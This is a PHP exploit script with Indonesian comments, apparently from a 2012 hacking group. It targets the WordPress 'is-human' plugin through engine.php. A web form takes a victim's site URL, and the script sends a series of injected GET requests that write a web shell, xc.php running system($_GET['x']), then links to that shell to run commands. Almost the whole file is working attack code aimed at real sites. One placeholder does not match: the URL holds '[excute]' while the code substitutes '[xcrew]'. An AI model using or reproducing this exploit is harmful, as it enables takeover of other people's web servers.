<?php/**
* @author BlueBoyz
* @copyright 2012 Www.ExploreCrew.Org
* @version 11.3.2
* @tutorial Alternative Remote Code Execution Vulnerability
* @for education purphose only
*/
# <!-- start:function grabing -->function jHTTP($languagge='en_gb', $method='POST',$url,$data){
$header = array('Accept-Language: '.$languagge.',en-us;q=0.7,en;q=0.3' );
$ch = curl_init();
if ($method == 'POST'){
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_POST, TRUE );
curl_setopt($ch, CURLOPT_POSTFIELDS,$data );
}elseif($method == 'GET'){
curl_setopt($ch, CURLOPT_URL,$url.''.$data);
}elseif($method == 'UPLOAD'){
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}
curl_setopt($ch, CURLOPT_REFERER, $url);
curl_setopt($ch, CURLOPT_COOKIEFILE, dirname(__FILE__).'/cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, dirname(__FILE__).'/cookie.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0');
curl_setopt($ch, CURLOPT_HTTPHEADER,$header) ;
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
return curl_exec($ch);
curl_close($ch);
}# <!-- end:function grabing -->if(isset($_POST['exp'])){
#mengambil link victim dari form, kemudian ditambah bug + prefix code [xcrew].
$victim =$_POST['victim'].'/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options;[excute];error';
#kita membuat perintah untuk menulis file xc.php dengan str <?php system($_GET['x']);
$exploit = array (
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(60));fclose(\$fp)", // menulis = <
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(63));fclose(\$fp)",// menulis = ?
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'php');fclose(\$fp)", // menulis = php
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(13));fclose(\$fp)", // menulis spasi
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'system');fclose(\$fp)", // menulis system
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(40));fclose(\$fp)", // menulis (
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(36));fclose(\$fp)", // menulis $
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'_GET');fclose(\$fp)", // menulis _GET
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(91));fclose(\$fp)", // menulis [
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(39));fclose(\$fp)", // menulis '
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'x');fclose(\$fp)", // menulis x
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(39));fclose(\$fp)", // menulis '
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(93));fclose(\$fp)", // menulis ]
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(41));fclose(\$fp)", // menulis )
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(59));fclose(\$fp)" // menulis ;
// semuanya klw digabungin menjadi <?php system($_GET['x']);
);
#looping array di atas
for($i=0;$i<count($exploit);$i++){
#tukar prefix [xcrew] tersebut dengan yg didalam array
$link = str_replace('[xcrew]',$exploit[$i],$victim);
jHTTP($languagge='en_gb', 'GET',$link,'');
}
$info = '<a href="'.$_POST['victim'].'/wp-content/plugins/is-human/xc.php?x=uname -a">Go to Shell</a>';
}#membuat form HTML nya?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<meta name="author" content="BlueBoyz" />
<title>Exploit IS Human</title>
</head>
<body>
<form method="post" action="" >
<input type="text" name="victim" size="100" /> eg: http://webvictim.com/wordpress/ <br />
<input type="submit" name="exp" />
</form>
<?php echo @$info ?></body>
</html>
teknik exploitasi yg sebelumna. ini utk attak ke 3x lho.. 
